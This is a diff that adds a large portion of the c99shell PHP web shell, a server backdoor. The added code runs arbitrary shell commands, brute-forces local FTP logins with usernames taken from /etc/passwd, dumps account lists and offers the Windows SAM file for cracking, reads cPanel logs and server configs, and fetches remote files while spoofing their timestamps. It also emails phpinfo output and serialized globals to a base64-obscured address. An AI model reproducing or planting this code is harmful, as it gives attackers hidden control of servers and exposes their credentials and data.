+ mysql_query("DROP TABLE tmp_file;");
+ }
+ }
+ mysql_drop_db($tmpdb); //comment it if you want to leave database
+ }
+ }
+ }
+ }
+ echo "</td></tr></table>";
+ if ($sql_sock)
+ {
+ $affected = @mysql_affected_rows($sql_sock);
+ if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
+ echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
+ }
+ echo "</table>";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d)
+ {
+ if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
+ elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
+ echo "<br><br>";
+ }
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "<b>Ftp Quick brute:</b><br>";
+ if (!win) {echo "This functions not work in Windows!<br><br>";}
+ else
+ {
+ function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+ {
+ if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
+ else {$TRUE = TRUE;}
+ if ($TRUE)
+ {
+ $sock = @ftp_connect($host,$port,$timeout);
+ if (@ftp_login($sock,$login,$pass))
+ {
+ echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." 
with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+ ob_flush();
+ return TRUE;
+ }
+ }
+ }
+ if (!empty($submit))
+ {
+ if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+ $fp = fopen("/etc/passwd","r");
+ if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+ else
+ {
+ if ($fqb_logging)
+ {
+ if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
+ else {$fqb_logfp = FALSE;}
+ $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
+ if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+ }
+ ob_flush();
+ $i = $success = 0;
+ $ftpquick_st = getmicrotime();
+ while(!feof($fp))
+ {
+ $str = explode(":",fgets($fp,2048));
+ if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+ {
+ echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
+ $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
+ if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+ $success++;
+ ob_flush();
+ }
+ if ($i > $fqb_lenght) {break;}
+ $i++;
+ }
+ if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. 
connections!\r\n";}
+ $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+ echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
+ $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
+ if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+ if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);}
+ fclose($fqb_logfp);
+ }
+ }
+ else
+ {
+ $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
+ $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
+ echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>";
+ }
+ }
+}
+if ($act == "d")
+{
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
+ else
+ {
+ echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
+ if (!$win)
+ {
+ echo "<tr><td><b>Owner/Group</b></td><td> ";
+ $ow = posix_getpwuid(fileowner($d));
+ $gr = 
posix_getgrgid(filegroup($d));
+ $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
+ }
+ echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
+ }
+}
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();}
+if ($act == "security")
+{
+ echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
+ if (!$win)
+ {
+ if ($nixpasswd)
+ {
+ if ($nixpasswd == 1) {$nixpasswd = 0;}
+ echo "<b>*nix /etc/passwd:</b><br>";
+ if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
+ if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
+ echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
+ $i = $nixpwd_s;
+ while ($i < $nixpwd_e)
+ {
+ $uid = posix_getpwuid($i);
+ if ($uid)
+ {
+ $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
+ echo join(":",$uid)."<br>";
+ }
+ $i++;
+ }
+ }
+ else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
+ }
+ else
+ {
+ $v = $_SERVER["WINDIR"]."\repair\sam";
+ if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
+ else {echo "<b><font color=green>You can crack winnt passwords. 
<a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
+ }
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." 
- </b>";} echo $name.nl2br($value)."<br>";}}
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
+ displaysecinfo("RAM",myshellexec("free -m"));
+ displaysecinfo("HDD space",myshellexec("df -h"));
+ displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
+ displaysecinfo("Is cURL installed?",myshellexec("which curl"));
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
+ displaysecinfo("Is links installed?",myshellexec("which links"));
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
+ displaysecinfo("Is GET installed?",myshellexec("which GET"));
+ displaysecinfo("Is perl installed?",myshellexec("which perl"));
+ displaysecinfo("Where is apache",myshellexec("whereis apache"));
+ displaysecinfo("Where is perl?",myshellexec("whereis perl"));
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+ if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+ elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+ else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "encoder")
+{
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = 
text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>";
+ foreach(array("md5","crypt","sha1","crc32") as $v)
+ {
+ echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
+ }
+ echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
+ <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>";
+ echo "<center>base64_decode - ";
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
+ else
+ {
+ $debase64 = base64_decode($encoder_input);
+ $debase64 = str_replace("\0","[0]",$debase64);
+ $a = explode("\r\n",$debase64);
+ $rows = count($a);
+ $debase64 = htmlspecialchars($debase64);
+ if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
+ else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" 
readonly>".$debase64."</textarea>";}
+ echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>";
+ }
+ echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
+ $c = strlen($encoder_input);
+ for($i=0;$i<$c;$i++)
+ {
+ $hex = dechex(ord($encoder_input[$i]));
+ if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
+ elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
+ }
+ echo "\" readonly><br></center></form>";
+}
+if ($act == "fsbuff")
+{
+ $arr_copy = $sess_data["copy"];
+ $arr_cut = $sess_data["cut"];
+ $arr = array_merge($arr_copy,$arr_cut);
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
+ else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}
+}
+if ($act == "selfremove")
+{
+ if (($submit == $rndcode) and ($submit != ""))
+ {
+ if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); }
+ else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+ if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
+ $rnd = rand(0,9).rand(0,9).rand(0,9);
+ echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." 
<br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
+ }
+}
+if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}}
+if ($act == "feedback")
+{
+ $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1");
+ if (!empty($submit))
+ {
+ $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
+ $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
+ if (!empty($fdbk_ref))
+ {
+ $tmp = @ob_get_contents();
+ ob_clean();
+ phpinfo();
+ $phpinfo = base64_encode(ob_get_contents());
+ ob_clean();
+ echo $tmp;
+ $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
+ }
+ mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail);
+ echo "<center><b>Thanks for your feedback! 
Your ticket ID: ".$ticket.".</b></center>"; + } + else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";} +} +if ($act == "search") +{ + echo "<b>Search in file-system:</b><br>"; + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $search_i_f = 0; + $search_i_d = 0; + $a = array + ( + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) {c99fsearch($v);} + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "<b>No files found!</b>";} + else + { + $ls_arr = $found; + $disp_fullpath = TRUE; + $act = "ls"; + } + } + echo "<form method=POST> +<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act 
value=\"".$dspact."\"> +<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp +<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> +<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea> +<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text +<br><br><input type=submit name=submit value=\"Search\"></form>"; + if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." 
objects per second).</b><br><br>";} +} +if ($act == "chmod") +{ + $mode = fileperms($d.$f); + if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";} + else + { + $form = TRUE; + if ($chmod_submit) + { + $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); + if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} + else {$err = "Can't chmod to ".$octet.".";} + } + if ($form) + { + $perms = parse_perms($mode); + echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" 
checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>"; + } + } +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile["tmp_name"])) + { + if (empty($uploadfilename)) {$destin = $uploadfile["name"];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";} + } + elseif (!empty($uploadurl)) + { + if (!empty($uploadfilename)) {$destin = $uploadfilename;} + else + { + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} + } + if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";} + else + { + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "Can't download file!<br>";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";} + else + { + fwrite($fp,$content,strlen($content)); + fclose($fp); + if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } + } + } + } + if ($miniform) + { + echo "<b>".$uploadmess."</b>"; + $act = "ls"; + } + else + { + echo "<b>File upload:</b><br><b>".$uploadmess."</b><form 
enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST> +Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br> +Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br> +Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br> +File-name (auto-fill): <input name=uploadfilename size=25><br><br> +<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br> +<input type=submit name=submit value=\"Upload\"> +</form>"; + } +} +if ($act == "delete") +{ + $delerr = ""; + foreach ($actbox as $v) + { + $result = FALSE; + $result = fs_rmobj($v); + if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";} + } + if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;} + $act = "ls"; +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. 
For enable, set directive \"\$useFSbuff\" as TRUE.</center>";} +} +else +{ + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } + elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} + elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." 
to ".$to."!<br>";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} + $act = "ls"; + } + elseif ($actarcbuff) + { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} + $cmdline .= " ".$actarcbuff_path; + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { + $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); + if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} + if (is_dir($v)) + { + if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} + $v .= "*"; + } + $cmdline .= " ".$v; + } + $tmp = realpath("."); + chdir($d); + $ret = myshellexec($cmdline); + chdir($tmp); + if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";} + $ret = str_replace("\r\n","\n",$ret); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { + if (in_array($v,$ret)) {fs_rmobj($v);} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." 
to ".$to."!<br>";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} + $act = "ls"; + } +} +if ($act == "cmd") +{ +if (trim($cmd) == "ps -aux") {$act = "processes";} +elseif (trim($cmd) == "tasklist") {$act = "processes";} +else +{ + @chdir($chdir); + if (!empty($submit)) + { + echo "<b>Result of execution this command</b>:<br>"; + $olddir = realpath("."); + @chdir($d); + $ret = myshellexec($cmd); + $ret = convert_cyr_string($ret,"d","w"); + if ($cmd_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; + } + else {echo $ret."<br>";} + @chdir($olddir); + } + else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} + echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>"; +} +} +if ($act == "ls") +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + $list = array(); + if ($h = @opendir($d)) + { + while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} + closedir($h); + } + else {} + } + if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";} + else + { + //Building array + $objects = array(); + $vd = "f"; //Viewing mode + if ($vd == "f") + { + $objects["head"] = array(); + $objects["folders"] = array(); + $objects["links"] = array(); + $objects["files"] = array(); + foreach ($list as $v) + { + $o = basename($v); + $row = array(); + if ($o == ".") {$row[] = $d.$o; $row[] = 